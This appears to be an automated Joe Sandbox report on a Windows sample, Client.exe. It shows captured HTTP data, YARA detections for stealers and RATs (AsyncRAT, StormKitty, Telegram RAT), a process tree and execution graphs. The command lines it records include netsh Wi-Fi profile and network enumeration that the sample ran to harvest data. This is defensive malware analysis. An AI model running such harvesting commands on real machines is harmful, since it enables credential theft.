                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: 0a 8b ef 73 d1 4a 95 71 15 74 cf 4f d7 0a 4b c8 c8 f1 3b a0 92 1b ec c6 0e 86 0f 84 de fd d5 a7 7d 1f cc 99 77 9a 8f 77 2c 5f 93 df fe bc ff e2 64 f1 15 01 f0 1b 23 00 11 18 fc 35 9e 8b 7e 5e a0 ff a7 1f a4 f2 9d 23 aa 17 d4 0c 3d d2 37 dd c3 6f d9 d8 a0 44 2e 03 4f 23 5d d3 5c 8c 7f c3 bd 0e ed 6d dd 8e d4 ee cb 50 11 a7 42 9c 7b 4c 9f ba 73 a4 bb a2 ad 9f c8 a7 9f af e3 a2 cb 36 8a 1d 41 6a e5 b8 89 5e 72 6f be b3 63 9e 59 6a 2f 3c 31 d1 f5 f2 cb 9d 5e 4e 91 2c 62 40 e8 af 76 89 73 92 35 ec ec 84 ba 01 b6 be b4 6b f2 ac b6 3a f6 af 44 df 8d 68 da cb 32 a7 23 66 6d bd 70 a1 c9 db 7d 9d 13 2f c7 d7 83 a6 1b b6 13 0b 06 82 42 24 2d 4a 57 f6 ca 47 d6 e7 6c 3e e9 45 15 97 54 9c fb 2a 67 97 b0 dd 47 1a 1a db 0c bd 08 86 52 d8 d3 14 07 3c a2 cd f9 f0 d8 8a ac
                                                      Data Ascii: sJqtOK;}ww,_d#5~^#=7oD.O#]\mPB{Ls6Aj^rocYj/<1^N,b@vs5k:Dh2#fmp}/B$-JWGl>ET*gGR<
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: fa 7a 9d 47 08 7c 09 32 85 3a 2e 54 f3 18 14 fc fe 7d 4f 4a 6a 4f 2a dd 56 98 be d4 d8 c1 e6 a4 65 5d 96 10 41 de da 47 fb 03 09 51 a9 bf b4 a8 d2 b0 40 35 13 e7 ae f9 4a 98 ac ab b4 e1 39 a0 c4 18 a3 64 59 30 71 2c aa 2d ef 72 fd 58 d9 86 26 f3 e8 e0 0b ae e8 ab e3 d6 f3 aa b4 e7 6f 15 c3 15 7e 29 48 df df b2 6a 8c 5e 63 58 44 da 5a 2d e5 58 35 c5 24 1f 23 5f cb ac 1a c6 ae f6 2b d5 ba 12 ee 14 3d a2 f4 41 2f bf eb 96 a5 7b ed c6 e8 c1 c0 01 26 72 62 f5 b3 46 c3 bb 60 96 f7 48 b4 3f b9 90 78 be f0 48 7f 70 f5 25 bd b2 2d a6 32 4c d3 d6 4a a7 c4 bb ad 18 99 0c 57 eb 38 ae ae 67 93 21 f4 77 0e 7f ee ef 17 e7 d6 a7 dd b5 1b 81 5f 7e 21 a4 27 fe 85 4d 75 26 5e 47 37 25 d9 79 18 6a 12 cc 01 cd 5e f8 46 59 93 bc 5f fb 1d 7f 85 d6 98 10 23 9b cb be 4e 24 aa 2f
                                                      Data Ascii: zG|2:.T}OJjO*Ve]AGQ@5J9dY0q,-rX&o~)Hj^cXDZ-X5$#_+=A/{&rbF`H?xHp%-2LJW8g!w_~!'Mu&^G7%yj^FY_#N$/
                                                      2024-08-30 05:14:17 UTC405INHTTP/1.1 401 Unauthorized
                                                      Server: nginx/1.18.0
                                                      Date: Fri, 30 Aug 2024 05:14:17 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 58
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:01:13:55
                                                      Start date:30/08/2024
                                                      Path:C:\Users\user\Desktop\Client.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Client.exe"
                                                      Imagebase:0xd00000
                                                      File size:174'080 bytes
                                                      MD5 hash:E29AB30E42348ECF2831928B7B95D5D8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                      Wow64 process (32bit):true
                                                      Commandline:chcp 65001
                                                      Imagebase:0xb90000
                                                      File size:12'800 bytes
                                                      MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:netsh wlan show profile
                                                      Imagebase:0xa60000
                                                      File size:82'432 bytes
                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr All
                                                      Imagebase:0xba0000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                      Wow64 process (32bit):true
                                                      Commandline:chcp 65001
                                                      Imagebase:0xb90000
                                                      File size:12'800 bytes
                                                      MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:01:14:07
                                                      Start date:30/08/2024
                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:netsh wlan show networks mode=bssid
                                                      Imagebase:0xa60000
                                                      File size:82'432 bytes
                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:15.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:102
                                                        Total number of Limit Nodes:1
                                                        execution_graph 24635 16b09c8 24636 16b09da 24635->24636 24640 16b75ce 24636->24640 24654 16b7570 24636->24654 24637 16b0a35 24641 16b75d9 24640->24641 24642 16b75ea 24641->24642 24668 16b7eeb 24641->24668 24674 16b7e50 24641->24674 24680 16b7e11 24641->24680 24686 16b7f58 24641->24686 24692 16b7f3b 24641->24692 24698 16b7ea7 24641->24698 24704 16b7e20 24641->24704 24710 16b7e6d 24641->24710 24716 16b7ece 24641->24716 24722 16b7f08 24641->24722 24728 16b7e8a 24641->24728 24642->24637 24655 16b759f 24654->24655 24656 16b75ea 24655->24656 24657 16b7eeb 3 API calls 24655->24657 24658 16b7e8a 3 API calls 24655->24658 24659 16b7f08 3 API calls 24655->24659 24660 16b7ece 3 API calls 24655->24660 24661 16b7e6d 3 API calls 24655->24661 24662 16b7e20 3 API calls 24655->24662 24663 16b7ea7 3 API calls 24655->24663 24664 16b7f3b 3 API calls 24655->24664 24665 16b7f58 3 API calls 24655->24665 24666 16b7e11 3 API calls 24655->24666 24667 16b7e50 3 API calls 24655->24667 24656->24637 24657->24656 24658->24656 24659->24656 24660->24656 24661->24656 24662->24656 24663->24656 24664->24656 24665->24656 24666->24656 24667->24656 24669 16b7ef0 24668->24669 24670 16b7f73 24669->24670 24734 5c70a7c 24669->24734 24738 5c70ac0 24669->24738 24743 5c70a6a 24669->24743 24670->24642 24675 16b7e55 24674->24675 24676 16b7f73 24675->24676 24677 5c70ac0 KiUserExceptionDispatcher 24675->24677 24678 5c70a7c KiUserExceptionDispatcher 24675->24678 24679 5c70a6a KiUserExceptionDispatcher 24675->24679 24676->24642 24677->24676 24678->24676 24679->24676 24681 16b7e46 24680->24681 24682 16b7f73 24681->24682 24683 5c70ac0 KiUserExceptionDispatcher 24681->24683 24684 5c70a7c KiUserExceptionDispatcher 24681->24684 24685 5c70a6a KiUserExceptionDispatcher 24681->24685 24682->24642 24683->24682 24684->24682 24685->24682 24687 16b7f5d 24686->24687 24688 16b7f73 24687->24688 24689 5c70ac0 KiUserExceptionDispatcher 24687->24689 24690 5c70a7c KiUserExceptionDispatcher 24687->24690 24691 5c70a6a KiUserExceptionDispatcher 24687->24691 24688->24642 24689->24688 24690->24688 24691->24688 24693 16b7f40 24692->24693 24694 16b7f73 24693->24694 24695 5c70ac0 KiUserExceptionDispatcher 24693->24695 24696 5c70a7c KiUserExceptionDispatcher 24693->24696 24697 5c70a6a KiUserExceptionDispatcher 24693->24697 24694->24642 24695->24694 24696->24694 24697->24694 24699 16b7eac 24698->24699 24700 16b7f73 24699->24700 24701 5c70ac0 KiUserExceptionDispatcher 24699->24701 24702 5c70a7c KiUserExceptionDispatcher 24699->24702 24703 5c70a6a KiUserExceptionDispatcher 24699->24703 24700->24642 24701->24700 24702->24700 24703->24700 24705 16b7e46 24704->24705 24706 16b7f73 24705->24706 24707 5c70ac0 KiUserExceptionDispatcher 24705->24707 24708 5c70a7c KiUserExceptionDispatcher 24705->24708 24709 5c70a6a KiUserExceptionDispatcher 24705->24709 24706->24642 24707->24706 24708->24706 24709->24706 24711 16b7e72 24710->24711 24712 16b7f73 24711->24712 24713 5c70ac0 KiUserExceptionDispatcher 24711->24713 24714 5c70a7c KiUserExceptionDispatcher 24711->24714 24715 5c70a6a KiUserExceptionDispatcher 24711->24715 24712->24642 24713->24712 24714->24712 24715->24712 24717 16b7ed3 24716->24717 24718 16b7f73 24717->24718 24719 5c70ac0 KiUserExceptionDispatcher 24717->24719 24720 5c70a7c KiUserExceptionDispatcher 24717->24720 24721 5c70a6a KiUserExceptionDispatcher 24717->24721 24718->24642 24719->24718 24720->24718 24721->24718 24723 16b7f0d 24722->24723 24724 16b7f73 24723->24724 24725 5c70ac0 KiUserExceptionDispatcher 24723->24725 24726 5c70a7c KiUserExceptionDispatcher 24723->24726 24727 5c70a6a KiUserExceptionDispatcher 24723->24727 24724->24642 24725->24724 24726->24724 24727->24724 24729 16b7e8f 24728->24729 24730 16b7f73 24729->24730 24731 5c70ac0 KiUserExceptionDispatcher 24729->24731 24732 5c70a7c KiUserExceptionDispatcher 24729->24732 24733 5c70a6a KiUserExceptionDispatcher 24729->24733 24730->24642 24731->24730 24732->24730 24733->24730 24735 5c70a7d 24734->24735 24736 5c70a82 KiUserExceptionDispatcher 24735->24736 24737 5c70a95 24735->24737 24736->24735 24737->24670 24739 5c70a7d 24738->24739 24742 5c70ace 24738->24742 24740 5c70a95 24739->24740 24741 5c70a82 KiUserExceptionDispatcher 24739->24741 24740->24670 24741->24739 24742->24670 24744 5c70a7d 24743->24744 24745 5c70a82 KiUserExceptionDispatcher 24744->24745 24746 5c70a95 24744->24746 24745->24744 24746->24670 24747 5c75320 24748 5c75366 KiUserCallbackDispatcher 24747->24748 24750 5c753b9 24748->24750 24751 5c70b20 24752 5c70b42 LdrInitializeThunk 24751->24752 24754 5c70b7c 24752->24754

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 417 5c70b20-5c70b75 LdrInitializeThunk 421 5c70b7c-5c70b83 417->421 422 5c70b85-5c70bb9 421->422 423 5c70bcb-5c70be4 421->423 422->423 432 5c70bbb-5c70bc5 422->432 425 5c70be6 423->425 426 5c70bef 423->426 425->426 428 5c70bf0 426->428 428->428 432->423
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4570218205.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5c70000_Client.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9f23865617b60f36a9b0a5243d34e37d4b60a06e2f1af9edccbf965746658563
                                                        • Instruction ID: 86e8e470db230ab6d4312b73f4a6dd11909ef96345a116c7c9b18fe135b0e05d
                                                        • Opcode Fuzzy Hash: 9f23865617b60f36a9b0a5243d34e37d4b60a06e2f1af9edccbf965746658563
                                                        • Instruction Fuzzy Hash: B6214D30B011158BDB14DF28C8A8B9E37F6EB88345F2048B9D406A7398DF799D42CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 444 16b5aa8-16b5b0e 446 16b5b58-16b5b5a 444->446 447 16b5b10-16b5b1b 444->447 449 16b5b5c-16b5b75 446->449 447->446 448 16b5b1d-16b5b29 447->448 450 16b5b2b-16b5b35 448->450 451 16b5b4c-16b5b56 448->451 456 16b5bc1-16b5bc3 449->456 457 16b5b77-16b5b83 449->457 452 16b5b39-16b5b48 450->452 453 16b5b37 450->453 451->449 452->452 455 16b5b4a 452->455 453->452 455->451 458 16b5bc5-16b5c1d 456->458 457->456 459 16b5b85-16b5b91 457->459 468 16b5c1f-16b5c2a 458->468 469 16b5c67-16b5c69 458->469 460 16b5b93-16b5b9d 459->460 461 16b5bb4-16b5bbf 459->461 462 16b5b9f 460->462 463 16b5ba1-16b5bb0 460->463 461->458 462->463 463->463 465 16b5bb2 463->465 465->461 468->469 471 16b5c2c-16b5c38 468->471 470 16b5c6b-16b5c83 469->470 478 16b5ccd-16b5ccf 470->478 479 16b5c85-16b5c90 470->479 472 16b5c5b-16b5c65 471->472 473 16b5c3a-16b5c44 471->473 472->470 474 16b5c48-16b5c57 473->474 475 16b5c46 473->475 474->474 477 16b5c59 474->477 475->474 477->472 480 16b5cd1-16b5d22 478->480 479->478 481 16b5c92-16b5c9e 479->481 489 16b5d28-16b5d36 480->489 482 16b5cc1-16b5ccb 481->482 483 16b5ca0-16b5caa 481->483 482->480 485 16b5cae-16b5cbd 483->485 486 16b5cac 483->486 485->485 487 16b5cbf 485->487 486->485 487->482 490 16b5d38-16b5d3e 489->490 491 16b5d3f-16b5d9f 489->491 490->491 498 16b5daf-16b5db3 491->498 499 16b5da1-16b5da5 491->499 501 16b5dc3-16b5dc7 498->501 502 16b5db5-16b5db9 498->502 499->498 500 16b5da7 499->500 500->498 504 16b5dc9-16b5dcd 501->504 505 16b5dd7-16b5ddb 501->505 502->501 503 16b5dbb 502->503 503->501 504->505 508 16b5dcf-16b5dd2 call 16b0d6c 504->508 506 16b5deb-16b5def 505->506 507 16b5ddd-16b5de1 505->507 510 16b5dff-16b5e03 506->510 511 16b5df1-16b5df5 506->511 507->506 509 16b5de3-16b5de6 call 16b0d6c 507->509 508->505 509->506 515 16b5e13-16b5e17 510->515 516 16b5e05-16b5e09 510->516 511->510 514 16b5df7-16b5dfa call 16b0d6c 511->514 514->510 519 16b5e19-16b5e1d 515->519 520 16b5e27 515->520 516->515 518 16b5e0b 516->518 518->515 519->520 521 16b5e1f 519->521 522 16b5e28 520->522 521->520 522->522
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4562429433.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_16b0000_Client.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V6m
                                                        • API String ID: 0-1924247956
                                                        • Opcode ID: 272e3c7dac5ee180bde0c91999c804b7585809aaf23d9d74736b5c4cc1042eb6
                                                        • Instruction ID: e931e1973442e702349d3fb7e14a0ee10a28b9ca0ea60542363df97cbb27497f
                                                        • Opcode Fuzzy Hash: 272e3c7dac5ee180bde0c91999c804b7585809aaf23d9d74736b5c4cc1042eb6
                                                        • Instruction Fuzzy Hash: 53B16F71E002498FDB14CFA9CC957EDBBF2AF88714F148229D516A7394EB749882CF85
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4562429433.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_16b0000_Client.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08ecbc98d6fadddfa654b920d3a6648546281f678c89421da5dbfbec64c4f440
                                                        • Instruction ID: 7b46aefe1be7713f3bae9d817851c7e96c7cb2a2d2a978db989f9d364663fb85
                                                        • Opcode Fuzzy Hash: 08ecbc98d6fadddfa654b920d3a6648546281f678c89421da5dbfbec64c4f440
                                                        • Instruction Fuzzy Hash: 38B16B71E006198FDB10CFA9CC857EEBBF2AF88714F148529D815E7394EB789895CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 16b85ed-16b85f9 1 16b85ff-16b8607 0->1 2 16b8609-16b861c 1->2 4 16b861e 2->4 5 16b85a6-16b85a7 2->5 4->2 6 16b8620-16b8622 4->6 5->0 7 16b8694-16b86ad 6->7 8 16b8624-16b862f 6->8 12 16b86af-16b86dc call 16b8244 7->12 13 16b86e3-16b86ea 7->13 11 16b867f-16b868b call 16b8238 8->11 16 16b8690-16b8693 11->16 12->13 13->11 15 16b86ec-16b86fe 13->15 20 16b870b-16b8762 15->20 21 16b8700 15->21 16->7 16->13 27 16b87d0-16b87e5 20->27 28 16b8764-16b87ce 20->28 21->20 31 16b87e6 27->31 28->27 31->31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4562429433.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_16b0000_Client.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: q$q$C
                                                        • API String ID: 0-758722769
                                                        • Opcode ID: f9474046342b291f940ceabe44df84c3845972bbfe08f330c64de53a52977852
                                                        • Instruction ID: 8322aff21c63fc284e6004cbdca4265bd76e161a12a40a3acedebd41b3802653
                                                        • Opcode Fuzzy Hash: f9474046342b291f940ceabe44df84c3845972bbfe08f330c64de53a52977852
                                                        • Instruction Fuzzy Hash: B441C970E0164ACFD715DF68C8905AEBBF6FF98300B60856EC405AB355EB74AD86CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 40 16b60e4-16b617c 43 16b617e-16b6189 40->43 44 16b61c6-16b61c8 40->44 43->44 46 16b618b-16b6197 43->46 45 16b61ca-16b61e2 44->45 53 16b622c-16b622e 45->53 54 16b61e4-16b61ef 45->54 47 16b61ba-16b61c4 46->47 48 16b6199-16b61a3 46->48 47->45 49 16b61a7-16b61b6 48->49 50 16b61a5 48->50 49->49 52 16b61b8 49->52 50->49 52->47 56 16b6230-16b6242 53->56 54->53 55 16b61f1-16b61fd 54->55 57 16b61ff-16b6209 55->57 58 16b6220-16b622a 55->58 63 16b6249-16b6275 56->63 59 16b620b 57->59 60 16b620d-16b621c 57->60 58->56 59->60 60->60 62 16b621e 60->62 62->58 64 16b627b-16b6289 63->64 65 16b628b-16b6291 64->65 66 16b6292-16b62ef 64->66 65->66 73 16b62ff-16b6303 66->73 74 16b62f1-16b62f5 66->74 76 16b6313-16b6317 73->76 77 16b6305-16b6309 73->77 74->73 75 16b62f7-16b62fa call 16b0d6c 74->75 75->73 78 16b6319-16b631d 76->78 79 16b6327-16b632b 76->79 77->76 81 16b630b-16b630e call 16b0d6c 77->81 78->79 83 16b631f 78->83 84 16b633b 79->84 85 16b632d-16b6331 79->85 81->76 83->79 87 16b633c 84->87 85->84 86 16b6333 85->86 86->84 87->87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4562429433.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_16b0000_Client.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V6m$\V6m
                                                        • API String ID: 0-4182456109
                                                        • Opcode ID: 73987fb24536047ac221de0b3cd50ba026afeae4a5b0a1f85a1cce0ba036f4d7
                                                        • Instruction ID: 9af817e5c3b15c255c59d3b40c10d3b45581c8b9769e453ba924c3883eec4499
                                                        • Opcode Fuzzy Hash: 73987fb24536047ac221de0b3cd50ba026afeae4a5b0a1f85a1cce0ba036f4d7
                                                        • Instruction Fuzzy Hash: 777138B0E006498FEB10CFA9CC817DEBBB2AF88714F148129E415A7354DB749882CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 88 16b60f0-16b617c 91 16b617e-16b6189 88->91 92 16b61c6-16b61c8 88->92 91->92 94 16b618b-16b6197 91->94 93 16b61ca-16b61e2 92->93 101 16b622c-16b622e 93->101 102 16b61e4-16b61ef 93->102 95 16b61ba-16b61c4 94->95 96 16b6199-16b61a3 94->96 95->93 97 16b61a7-16b61b6 96->97 98 16b61a5 96->98 97->97 100 16b61b8 97->100 98->97 100->95 104 16b6230-16b6275 101->104 102->101 103 16b61f1-16b61fd 102->103 105 16b61ff-16b6209 103->105 106 16b6220-16b622a 103->106 112 16b627b-16b6289 104->112 107 16b620b 105->107 108 16b620d-16b621c 105->108 106->104 107->108 108->108 110 16b621e 108->110 110->106 113 16b628b-16b6291 112->113 114 16b6292-16b62ef 112->114 113->114 121 16b62ff-16b6303 114->121 122 16b62f1-16b62f5 114->122 124 16b6313-16b6317 121->124 125 16b6305-16b6309 121->125 122->121 123 16b62f7-16b62fa call 16b0d6c 122->123 123->121 126 16b6319-16b631d 124->126 127 16b6327-16b632b 124->127 125->124 129 16b630b-16b630e call 16b0d6c 125->129 126->127 131 16b631f 126->131 132 16b633b 127->132 133 16b632d-16b6331 127->133 129->124 131->127 135 16b633c 132->135 133->132 134 16b6333 133->134 134->132 135->135
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4562429433.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_16b0000_Client.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V6m$\V6m
                                                        • API String ID: 0-4182456109
                                                        • Opcode ID: 613f7b09ed59da9702c2def2d63ef8437eeee5e9804f8f006528870217d4fa13
                                                        • Instruction ID: 0cf6978adfb1b820b39fb5cf3725a2cd62fa0aeab408837cc94adfc1d2d0d4bd
                                                        • Opcode Fuzzy Hash: 613f7b09ed59da9702c2def2d63ef8437eeee5e9804f8f006528870217d4fa13
                                                        • Instruction Fuzzy Hash: A6712870E002099FEB14CFA9CC847DEBBF2AF88714F148129E415AB354EB749881CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 136 16bcb78-16bcb99 137 16bcb9b-16bcb9f 136->137 138 16bcba7-16bcbab 136->138 139 16bd20a 137->139 140 16bcba5 137->140 138->139 141 16bcbb1-16bcbb4 138->141 143 16bd20f-16bd214 139->143 140->141 142 16bcbba-16bcbc2 141->142 141->143 144 16bcbd2-16bcbee call 16bca98 142->144 145 16bcbc4-16bcbc7 142->145 151 16bd219-16bd220 143->151 153 16bcc6b-16bcc97 call 16bca98 144->153 154 16bcbf0-16bcc06 call 16bca98 144->154 147 16bcbcd 145->147 148 16bcc9c-16bccc0 call 16bca98 145->148 147->151 158 16bccdd-16bcceb 148->158 159 16bccc2-16bccdb 148->159 153->151 165 16bcc38-16bcc5d call 16bca98 154->165 166 16bcc08-16bcc0c 154->166 158->139 160 16bccf1-16bccf3 158->160 167 16bcd15-16bcd27 159->167 160->139 164 16bccf9-16bccfb 160->164 164->139 168 16bcd01-16bcd0d 164->168 187 16bcc65-16bcc69 165->187 166->165 169 16bcc0e-16bcc2e call 16bca98 166->169 174 16bcd39-16bcd56 call 16bca98 167->174 175 16bcd29 167->175 168->167 188 16bcc36 169->188 184 16bcd58-16bcd5c 174->184 185 16bcd5e-16bcd6d 174->185 175->151 178 16bcd2f-16bcd33 175->178 178->151 178->174 184->185 186 16bcd70-16bce02 184->186 185->186 196 16bce05-16bce2d 186->196 187->153 187->154 188->187 196->143 199 16bce33-16bce51 196->199 200 16bce5a-16bce63 199->200 201 16bce53 199->201 204 16bce8d-16bceb3 200->204 205 16bce65-16bce8b 200->205 202 16bceb5-16bcec6 201->202 203 16bce55-16bce58 201->203 206 16bcec8-16bcecc 202->206 207 16bced4-16bced8 202->207 203->200 203->202 213 16bcef6-16bceff 204->213 